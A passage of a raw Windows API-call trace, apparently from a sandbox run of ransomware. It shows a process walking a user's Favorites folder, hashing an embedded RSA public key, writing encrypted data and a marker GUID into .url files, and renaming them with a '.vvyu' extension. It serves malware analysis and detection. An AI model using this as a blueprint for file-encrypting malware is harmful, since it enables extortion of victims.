(HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a18 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399b8 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399d0 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.387] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.387] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39988 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a18 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.388] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.389] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.391] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d391c8 | out: hHeap=0x6a0000) returned 1 [0189.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.394] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.395] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.396] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.396] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.398] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.398] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.398] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.398] CloseHandle (hObject=0x584) returned 1 [0189.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0189.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.400] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url.vvyu")) returned 1 [0189.401] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.402] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.402] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.405] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.405] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0189.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.406] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.406] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.406] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0189.406] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.407] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.407] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.410] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.410] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.411] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.412] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.412] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.412] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.412] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.412] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.413] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.413] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.413] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.413] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.413] GetLastError () returned 0x0 [0189.413] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.413] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.414] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.414] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.414] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.414] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d391c8 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39210 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399b8 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.415] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399b8 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d399a0 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.418] GetCurrentThreadId () returned 0x264 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43c10 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.418] GetCurrentThreadId () returned 0x264 [0189.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399a0 [0189.467] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 